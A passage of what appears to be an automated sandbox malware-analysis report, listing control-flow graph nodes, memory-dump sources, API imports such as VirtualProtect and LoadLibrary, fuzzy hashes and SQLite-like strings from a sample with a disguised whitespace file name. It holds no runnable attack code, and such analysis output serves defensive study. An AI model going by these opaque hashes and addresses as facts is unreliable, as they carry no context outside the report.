7ff8a86f9755 959->977 978 7ff8a86f975b-7ff8a86f978c 959->978 960->959 962->867 963->933 968 7ff8a86f95af-7ff8a86f95b4 964->968 965->968 966->966 971 7ff8a86f934b-7ff8a86f9355 966->971 972 7ff8a86f95b6-7ff8a86f95cc call 7ff8a87a3550 968->972 973 7ff8a86f95e1-7ff8a86f95e7 968->973 971->927 971->939 972->914 984 7ff8a86f95ce-7ff8a86f95df call 7ff8a875bff0 972->984 973->885 977->978 981 7ff8a86f979f-7ff8a86f97a6 978->981 982 7ff8a86f978e-7ff8a86f979d 978->982 985 7ff8a86f97aa-7ff8a86f97cc call 7ff8a86f7800 981->985 982->985 983->867 984->914 984->973 991 7ff8a86f97d4-7ff8a86f97d7 985->991 992 7ff8a86f97ce-7ff8a86f97d2 985->992 993 7ff8a86f97de 991->993 994 7ff8a86f97d9-7ff8a86f97dc 991->994 995 7ff8a86f97e2-7ff8a86f97f4 992->995 993->995 994->993 994->995 996 7ff8a86f97f6-7ff8a86f97fd 995->996 997 7ff8a86f97ff-7ff8a86f9811 995->997 998 7ff8a86f9815-7ff8a86f9829 996->998 997->998 998->867
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: -journal$immutable$nolock
                                                        • API String ID: 4149376297-4201244970
                                                        • Opcode ID: 69978317b8daf74f840676876c583812051eaf0fa5d8f4842daa151fa3804642
                                                        • Instruction ID: 48a9d15bd801dca7b2c01641de93c06fe9e4072f6c3892faa95054970c26805d
                                                        • Opcode Fuzzy Hash: 69978317b8daf74f840676876c583812051eaf0fa5d8f4842daa151fa3804642
                                                        • Instruction Fuzzy Hash: 7432BF22A0AB82A6FB619F25944837937A1FF44BD4F085234CA6E077D4DF7DE855C328

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1000 7ff8a8762bb0-7ff8a8762c7e 00007FF8BA251730 1001 7ff8a8762c95-7ff8a8762c99 1000->1001 1002 7ff8a8762c80-7ff8a8762c92 1000->1002 1003 7ff8a8762cb9-7ff8a8762cbf 1001->1003 1004 7ff8a8762c9b-7ff8a8762cb4 call 7ff8a86ea550 1001->1004 1002->1001 1006 7ff8a8762cc1-7ff8a8762ccb 1003->1006 1007 7ff8a8762cd2-7ff8a8762cda 1003->1007 1011 7ff8a876312c-7ff8a876315a call 7ff8a8762900 call 7ff8a880abc0 1004->1011 1006->1007 1009 7ff8a8762db1-7ff8a8762db9 1007->1009 1010 7ff8a8762ce0-7ff8a8762ce6 1007->1010 1012 7ff8a8762dbb-7ff8a8762dbe call 7ff8a877b9a0 1009->1012 1013 7ff8a8762dc3-7ff8a8762dc6 1009->1013 1014 7ff8a8762dac 1010->1014 1015 7ff8a8762cec-7ff8a8762cef 1010->1015 1012->1013 1018 7ff8a8762e6d-7ff8a8762e75 call 7ff8a879ccb0 1013->1018 1019 7ff8a8762dcc-7ff8a8762dcf 1013->1019 1014->1009 1020 7ff8a8762cf0-7ff8a8762cfc 1015->1020 1027 7ff8a8762e7a-7ff8a8762e7d 1018->1027 1023 7ff8a8762ddd-7ff8a8762de4 1019->1023 1024 7ff8a8762dd1-7ff8a8762dd7 1019->1024 1025 7ff8a8762d6e-7ff8a8762d79 1020->1025 1026 7ff8a8762cfe-7ff8a8762d02 1020->1026 1031 7ff8a8762e0e-7ff8a8762e11 1023->1031 1032 7ff8a8762de6-7ff8a8762e09 call 7ff8a86ea3b0 call 7ff8a86e6e90 1023->1032 1024->1018 1024->1023 1028 7ff8a8762d7b-7ff8a8762d7d 1025->1028 1029 7ff8a8762da7 1025->1029 1033 7ff8a8762d04-7ff8a8762d0b 1026->1033 1034 7ff8a8762d17-7ff8a8762d1f 1026->1034 1037 7ff8a8762e7f-7ff8a8762e86 1027->1037 1038 7ff8a8762e89-7ff8a8762e95 1027->1038 1028->1020 1029->1014 1040 7ff8a8762e60-7ff8a8762e6b 1031->1040 1041 7ff8a8762e13-7ff8a8762e25 call 7ff8a86e69f0 1031->1041 1032->1011 1033->1034 1036 7ff8a8762d0d-7ff8a8762d15 call 7ff8a86ff2c0 1033->1036 1034->1025 1039 7ff8a8762d21-7ff8a8762d28 1034->1039 1036->1034 1037->1038 1045 7ff8a8762efa-7ff8a8762efe 1038->1045 1046 7ff8a8762e97-7ff8a8762ea3 1038->1046 1047 7ff8a8762d2a-7ff8a8762d2e 1039->1047 1048 7ff8a8762d37-7ff8a8762d3e 1039->1048 1040->1027 1041->1040 1066 7ff8a8762e27-7ff8a8762e5e call 7ff8a880bb74 call 7ff8a879ccb0 call 7ff8a86e6570 1041->1066 1052 7ff8a8762f00-7ff8a8762f0e 1045->1052 1053 7ff8a8762f13-7ff8a8762f19 1045->1053 1046->1045 1054 7ff8a8762ea5-7ff8a8762eaf 1046->1054 1047->1048 1055 7ff8a8762d30-7ff8a8762d35 1047->1055 1057 7ff8a8762d5a 1048->1057 1058 7ff8a8762d40-7ff8a8762d43 1048->1058 1060 7ff8a876304e-7ff8a8763051 1052->1060 1061 7ff8a8762f1f-7ff8a8762f22 1053->1061 1062 7ff8a87630cb-7ff8a87630e9 1053->1062 1063 7ff8a8762ebb-7ff8a8762ec1 1054->1063 1064 7ff8a8762eb1 1054->1064 1065 7ff8a8762d5c-7ff8a8762d60 1055->1065 1057->1065 1067 7ff8a8762d45-7ff8a8762d49 1058->1067 1068 7ff8a8762d51-7ff8a8762d58 1058->1068 1069 7ff8a876306c-7ff8a8763078 1060->1069 1070 7ff8a8763053-7ff8a876305a 1060->1070 1061->1062 1071 7ff8a8762f28-7ff8a8762f2d 1061->1071 1072 7ff8a87630eb-7ff8a87630f4 1062->1072 1073 7ff8a8763106-7ff8a876310d 1062->1073 1074 7ff8a8762eec 1063->1074 1075 7ff8a8762ec3-7ff8a8762ed5 call 7ff8a86e69f0 1063->1075 1064->1063 1078 7ff8a8762d6a-7ff8a8762d6c 1065->1078 1079 7ff8a8762d62-7ff8a8762d65 call 7ff8a86ff290 1065->1079 1066->1027 1067->1068 1077 7ff8a8762d4b-7ff8a8762d4f 1067->1077 1068->1057 1068->1058 1089 7ff8a876309f-7ff8a87630a8 1069->1089 1090 7ff8a876307a-7ff8a8763093 call 7ff8a86ea3b0 1069->1090 1082 7ff8a876305c-7ff8a876305f call 7ff8a8714a40 1070->1082 1083 7ff8a8763064-7ff8a8763067 call 7ff8a8714bb0 1070->1083 1071->1060 1084 7ff8a8762f33-7ff8a8762f3a 1071->1084 1085 7ff8a87630f6-7ff8a87630fe call 7ff8a870f7b0 1072->1085 1086 7ff8a8763100 1072->1086 1073->1011 1091 7ff8a876310f 1073->1091 1080 7ff8a8762eee-7ff8a8762ef5 1074->1080 1075->1080 1110 7ff8a8762ed7-7ff8a8762eea call 7ff8a880bb74 1075->1110 1077->1055 1077->1068 1078->1025 1081 7ff8a8762d82-7ff8a8762da2 call 7ff8a86ea3b0 1078->1081 1079->1078 1080->1045 1081->1011 1082->1083 1083->1069 1084->1060 1100 7ff8a8762f40-7ff8a8762f4c 1084->1100 1085->1073 1086->1073 1093 7ff8a87630bd-7ff8a87630c9 call 7ff8a86ea2e0 1089->1093 1094 7ff8a87630aa-7ff8a87630b2 1089->1094 1090->1073 1118 7ff8a8763095-7ff8a876309d call 7ff8a86e6570 1090->1118 1098 7ff8a8763110-7ff8a876312a call 7ff8a86e6570 1091->1098 1093->1073 1094->1093 1105 7ff8a87630b4-7ff8a87630bb 1094->1105 1098->1011 1100->1060 1108 7ff8a8762f52-7ff8a8762f57 1100->1108 1105->1073 1116 7ff8a8762f60-7ff8a8762f74 1108->1116 1110->1080 1119 7ff8a8762f7a-7ff8a8762f7e 1116->1119 1120 7ff8a8763033-7ff8a876303e 1116->1120 1118->1073 1126 7ff8a8762fb8-7ff8a8762fc0 1119->1126 1127 7ff8a8762f80-7ff8a8762f92 call 7ff8a8702ba0 1119->1127 1120->1116 1125 7ff8a8763044-7ff8a8763049 1120->1125 1125->1060 1128 7ff8a8762fd3-7ff8a8762fe7 1126->1128 1129 7ff8a8762fc2-7ff8a8762fc9 1126->1129 1139 7ff8a8762f9b-7ff8a8762fa3 call 7ff8a86e6db0 1127->1139 1140 7ff8a8762f94-7ff8a8762f99 1127->1140 1132 7ff8a8762fe9-7ff8a8762fed 1128->1132 1133 7ff8a8762ff7-7ff8a8763003 1128->1133 1129->1128 1131 7ff8a8762fcb-7ff8a8762fce call 7ff8a86ff2c0 1129->1131 1131->1128 1132->1133 1136 7ff8a8762fef-7ff8a8762ff2 call 7ff8a86ff290 1132->1136 1137 7ff8a8763005-7ff8a876301f call 7ff8a873fb70 1133->1137 1138 7ff8a8763024-7ff8a8763029 1133->1138 1136->1133 1137->1138 1138->1120 1144 7ff8a876302b-7ff8a876302e call 7ff8a8703f60 1138->1144 1145 7ff8a8762fa7-7ff8a8762faa 1139->1145 1140->1139 1140->1145 1144->1120 1145->1125 1148 7ff8a8762fb0 1145->1148 1148->1126
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: database schema is locked: %s$out of memory$statement too long
                                                        • API String ID: 4149376297-1046679716
                                                        • Opcode ID: 4c33e359c72f1d1575956bb4a2d5f390f406632b1f4cea5c10e2345e3c8caaf7
                                                        • Instruction ID: f641ece3147da8672386b6dbbf72de89d39faf2a833ba16c447c1f49a9068207
                                                        • Opcode Fuzzy Hash: 4c33e359c72f1d1575956bb4a2d5f390f406632b1f4cea5c10e2345e3c8caaf7
                                                        • Instruction Fuzzy Hash: 36F1B132A5E6C2A6FB65CB21D4043BAA7A0FB85BC4F180135DA4D07795DF7CE984C328
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336473513.00007FF8A86A7000.00000080.00000001.01000000.00000010.sdmp, Offset: 00007FF8A81B0000, based on PE: true
                                                        • Associated: 00000002.00000002.2334248171.00007FF8A81B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A81B1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A81C2000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A81D2000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A81D8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A8222000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A8237000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A8247000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A824E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A825C000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A8519000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A851B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A8592000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A85EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A865A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A868F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334291854.00007FF8A86A1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336517828.00007FF8A86A9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a81b0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                        • String ID:
                                                        • API String ID: 3300690313-0
                                                        • Opcode ID: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
                                                        • Instruction ID: 2c6171d22ab5a5593a2ac98d634ea2c8d48e5b6f0387b6ad01f26fdae4f4055b
                                                        • Opcode Fuzzy Hash: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
                                                        • Instruction Fuzzy Hash: 2262476262919296F7598F38D4042BEB7A0F7587C5F086531EA9EC37C4EB3CEA14CB14
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 92d82e4b214818c158f58746d604a038a40c5e57c576eefab9a689c2dc8594a3
                                                        • Instruction ID: 5f2b448927f59957cefc648db8c8fcda0a21052fa020cb0b51fbba93f2955d97
                                                        • Opcode Fuzzy Hash: 92d82e4b214818c158f58746d604a038a40c5e57c576eefab9a689c2dc8594a3
                                                        • Instruction Fuzzy Hash: E7A11764E0FB47A1FE5A8B45A41837433A1FF59BC4F142579C98E077A0DFACE9918328

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 293 7ff8a86f0250-7ff8a86f029c 294 7ff8a86f02a1-7ff8a86f0314 293->294 295 7ff8a86f0316-7ff8a86f0325 call 7ff8a86efc70 294->295 296 7ff8a86f033b-7ff8a86f034b call 7ff8a86ed2c0 294->296 301 7ff8a86f08b7-7ff8a86f08da call 7ff8a880abc0 295->301 302 7ff8a86f032b-7ff8a86f0336 295->302 303 7ff8a86f0852-7ff8a86f0855 296->303 304 7ff8a86f0351-7ff8a86f037a 296->304 302->296 307 7ff8a86f0857-7ff8a86f085e 303->307 308 7ff8a86f08b2 303->308 305 7ff8a86f0380-7ff8a86f0395 304->305 315 7ff8a86f0397-7ff8a86f03a3 305->315 316 7ff8a86f03d2-7ff8a86f03dc 305->316 310 7ff8a86f0860-7ff8a86f086a 307->310 311 7ff8a86f08a9 307->311 308->301 313 7ff8a86f0872-7ff8a86f089f 310->313 314 7ff8a86f086c 310->314 311->308 313->308 331 7ff8a86f08a1-7ff8a86f08a7 313->331 314->313 318 7ff8a86f03e6-7ff8a86f0401 315->318 324 7ff8a86f03a5-7ff8a86f03ab 315->324 316->318 319 7ff8a86f03de-7ff8a86f03e0 316->319 322 7ff8a86f0403-7ff8a86f0407 318->322 323 7ff8a86f0409-7ff8a86f0412 318->323 319->318 321 7ff8a86f0628-7ff8a86f062f 319->321 326 7ff8a86f0631-7ff8a86f063b 321->326 327 7ff8a86f067a 321->327 328 7ff8a86f0415-7ff8a86f0429 call 7ff8a87a3550 322->328 323->328 329 7ff8a86f03b3-7ff8a86f03b6 324->329 330 7ff8a86f03ad-7ff8a86f03b1 324->330 332 7ff8a86f0643-7ff8a86f0670 326->332 333 7ff8a86f063d 326->333 338 7ff8a86f0683 327->338 339 7ff8a86f0446 328->339 340 7ff8a86f042b-7ff8a86f0444 call 7ff8a875bff0 328->340 336 7ff8a86f03bf-7ff8a86f03d0 329->336 337 7ff8a86f03b8-7ff8a86f03bd 329->337 330->329 330->336 331->308 341 7ff8a86f068a-7ff8a86f068d 332->341 354 7ff8a86f0672-7ff8a86f0678 332->354 333->332 336->305 337->318 337->336 338->341 345 7ff8a86f0448-7ff8a86f046a 339->345 340->345 346 7ff8a86f068f-7ff8a86f0696 341->346 347 7ff8a86f06eb-7ff8a86f06f0 341->347 350 7ff8a86f0470-7ff8a86f0497 CreateFileW 345->350 351 7ff8a86f06e2 346->351 352 7ff8a86f0698-7ff8a86f069b 346->352 347->301 355 7ff8a86f0540 350->355 356 7ff8a86f049d-7ff8a86f049f 350->356 351->347 357 7ff8a86f06a3-7ff8a86f06d0 352->357 358 7ff8a86f069d 352->358 354->338 361 7ff8a86f0544-7ff8a86f0547 355->361 359 7ff8a86f04a1-7ff8a86f04b3 356->359 360 7ff8a86f04ef-7ff8a86f04fc 356->360 357->347 380 7ff8a86f06d2-7ff8a86f06dd 357->380 358->357 365 7ff8a86f04b7-7ff8a86f04dd call 7ff8a86f0aa0 359->365 366 7ff8a86f04b5 359->366 374 7ff8a86f04fe-7ff8a86f0504 360->374 375 7ff8a86f053c-7ff8a86f053e 360->375 362 7ff8a86f0577-7ff8a86f057b 361->362 363 7ff8a86f0549-7ff8a86f0572 call 7ff8a86e94b0 361->363 369 7ff8a86f0581-7ff8a86f0591 call 7ff8a86e6490 362->369 370 7ff8a86f072f-7ff8a86f073d 362->370 363->362 385 7ff8a86f04e1-7ff8a86f04e3 365->385 386 7ff8a86f04df 365->386 366->365 389 7ff8a86f0593-7ff8a86f059a 369->389 390 7ff8a86f05ee-7ff8a86f05f3 369->390 376 7ff8a86f073f-7ff8a86f074b 370->376 377 7ff8a86f074d-7ff8a86f0766 call 7ff8a86e6490 370->377 382 7ff8a86f0516-7ff8a86f0519 374->382 383 7ff8a86f0506-7ff8a86f0514 374->383 375->361 376->377 394 7ff8a86f07c3-7ff8a86f07c6 377->394 395 7ff8a86f0768-7ff8a86f076f 377->395 380->301 391 7ff8a86f0522-7ff8a86f0537 382->391 392 7ff8a86f051b-7ff8a86f0520 382->392 383->382 383->391 387 7ff8a86f04e5-7ff8a86f04e9 385->387 388 7ff8a86f04eb 385->388 386->385 387->355 387->388 388->360 399 7ff8a86f05e5 389->399 400 7ff8a86f059c-7ff8a86f05a6 389->400 397 7ff8a86f06f5-7ff8a86f072a call 7ff8a86eda80 call 7ff8a87a25d0 390->397 398 7ff8a86f05f9-7ff8a86f05fe 390->398 391->350 392->375 392->391 408 7ff8a86f07cd 394->408 409 7ff8a86f07c8-7ff8a86f07cb 394->409 401 7ff8a86f0771-7ff8a86f077b 395->401 402 7ff8a86f07ba 395->402 397->301 398->397 403 7ff8a86f0604-7ff8a86f0623 398->403 399->390 405 7ff8a86f05ae-7ff8a86f05db 400->405 406 7ff8a86f05a8 400->406 411 7ff8a86f0783-7ff8a86f07b0 401->411 412 7ff8a86f077d 401->412 402->394 403->294 405->390 426 7ff8a86f05dd-7ff8a86f05e3 405->426 406->405 410 7ff8a86f07d4-7ff8a86f07ec 408->410 409->410 414 7ff8a86f07f2-7ff8a86f07fa 410->414 415 7ff8a86f07ee 410->415 411->394 429 7ff8a86f07b2-7ff8a86f07b8 411->429 412->411 418 7ff8a86f07fc-7ff8a86f0810 call 7ff8a87a3550 414->418 419 7ff8a86f082a-7ff8a86f0850 414->419 415->414 427 7ff8a86f0826 418->427 428 7ff8a86f0812-7ff8a86f0824 call 7ff8a875bff0 418->428 419->301 426->390 427->419 428->419 428->427 429->394
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730$CreateFile
                                                        • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                        • API String ID: 3420686642-3829269058
                                                        • Opcode ID: ef0112e9abf40a3b3d134f616128f0a0d28c5b40f3fddafe2bf25c5b25aad74d
                                                        • Instruction ID: 970356a7b86f5e0ca1bfef56f9745d6ac42435413ddcb0b13aaf9f91274e2f20
                                                        • Opcode Fuzzy Hash: ef0112e9abf40a3b3d134f616128f0a0d28c5b40f3fddafe2bf25c5b25aad74d
                                                        • Instruction Fuzzy Hash: 67029021E0FB42A6FA549B21E85867973A0FF88BD4F041235DE4E426A4DF7CEC44C769

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1149 7ff8a86f9e80-7ff8a86f9ea0 1150 7ff8a86f9ed5-7ff8a86f9efa 1149->1150 1151 7ff8a86f9ea2-7ff8a86f9ed0 call 7ff8a86e94b0 1149->1151 1156 7ff8a86f9f00-7ff8a86f9f0b 1150->1156 1157 7ff8a86f9faa-7ff8a86f9fb9 1150->1157 1155 7ff8a86fa0ee-7ff8a86fa101 1151->1155 1158 7ff8a86f9f15-7ff8a86f9f22 1156->1158 1159 7ff8a86f9f0d-7ff8a86f9f10 1156->1159 1160 7ff8a86f9fbb-7ff8a86f9fc8 call 7ff8a86f3ca0 1157->1160 1161 7ff8a86f9fca-7ff8a86f9fce 1157->1161 1175 7ff8a86f9f24-7ff8a86f9f2b 1158->1175 1176 7ff8a86f9f80-7ff8a86f9fa4 1158->1176 1164 7ff8a86fa02c-7ff8a86fa038 1159->1164 1163 7ff8a86f9fd2-7ff8a86f9fde 1160->1163 1161->1163 1166 7ff8a86f9ff0-7ff8a86f9ff6 1163->1166 1167 7ff8a86f9fe0-7ff8a86f9fe3 1163->1167 1168 7ff8a86fa042-7ff8a86fa04b 1164->1168 1169 7ff8a86fa03a-7ff8a86fa03d call 7ff8a86f6ff0 1164->1169 1172 7ff8a86fa050-7ff8a86fa05c 1166->1172 1173 7ff8a86f9ff8-7ff8a86fa01f call 7ff8a86e94b0 1166->1173 1167->1166 1171 7ff8a86f9fe5-7ff8a86f9feb 1167->1171 1177 7ff8a86fa0e9 1168->1177 1169->1168 1180 7ff8a86fa0e7 1171->1180 1178 7ff8a86fa07e-7ff8a86fa084 1172->1178 1179 7ff8a86fa05e-7ff8a86fa061 1172->1179 1189 7ff8a86fa024-7ff8a86fa027 call 7ff8a86f3dc0 1173->1189 1182 7ff8a86f9f46-7ff8a86f9f4d 1175->1182 1183 7ff8a86f9f2d 1175->1183 1176->1157 1176->1164 1177->1155 1187 7ff8a86fa086-7ff8a86fa08e 1178->1187 1188 7ff8a86fa09a-7ff8a86fa09d 1178->1188 1179->1178 1184 7ff8a86fa063-7ff8a86fa066 1179->1184 1180->1177 1185 7ff8a86f9f4f-7ff8a86f9f56 1182->1185 1186 7ff8a86f9f6a-7ff8a86f9f75 1182->1186 1191 7ff8a86f9f30-7ff8a86f9f35 1183->1191 1184->1178 1194 7ff8a86fa068-7ff8a86fa071 call 7ff8a86f7c40 1184->1194 1185->1176 1195 7ff8a86f9f58-7ff8a86f9f5d 1185->1195 1186->1176 1210 7ff8a86f9f77-7ff8a86f9f7a 1186->1210 1187->1189 1196 7ff8a86fa090-7ff8a86fa098 call 7ff8a86f3d00 1187->1196 1198 7ff8a86fa0d5-7ff8a86fa0e2 00007FF8BA251730 1188->1198 1199 7ff8a86fa09f-7ff8a86fa0a9 1188->1199 1189->1164 1192 7ff8a86f9f37-7ff8a86f9f3b 1191->1192 1193 7ff8a86f9f3d-7ff8a86f9f44 1191->1193 1192->1182 1192->1193 1193->1182 1193->1191 1208 7ff8a86fa076-7ff8a86fa07a 1194->1208 1195->1186 1201 7ff8a86f9f5f-7ff8a86f9f66 1195->1201 1196->1164 1198->1180 1204 7ff8a86fa0ad-7ff8a86fa0b0 1199->1204 1205 7ff8a86fa0ab 1199->1205 1201->1195 1209 7ff8a86f9f68 1201->1209 1206 7ff8a86fa0b2-7ff8a86fa0b8 call 7ff8a86f31c0 1204->1206 1207 7ff8a86fa0bd-7ff8a86fa0d1 call 7ff8a86f66f0 1204->1207 1205->1204 1206->1207 1207->1198 1216 7ff8a86fa0d3 1207->1216 1208->1180 1214 7ff8a86fa07c 1208->1214 1209->1176 1210->1164 1210->1176 1214->1189 1216->1198
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                        • API String ID: 0-3418467682
                                                        • Opcode ID: 70763ae1427885678d87873981513cb12e4759df12c4f2b9939fb91df184ef28
                                                        • Instruction ID: 26bcce2138265cbe9c161491d56417b85aa4daaece75011d834b86fb2da82935
                                                        • Opcode Fuzzy Hash: 70763ae1427885678d87873981513cb12e4759df12c4f2b9939fb91df184ef28
                                                        • Instruction Fuzzy Hash: A9714F61A0B642A1FA648B15E44837977A1FF84BC8F146035CE4E47695DFBDEC41C328

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
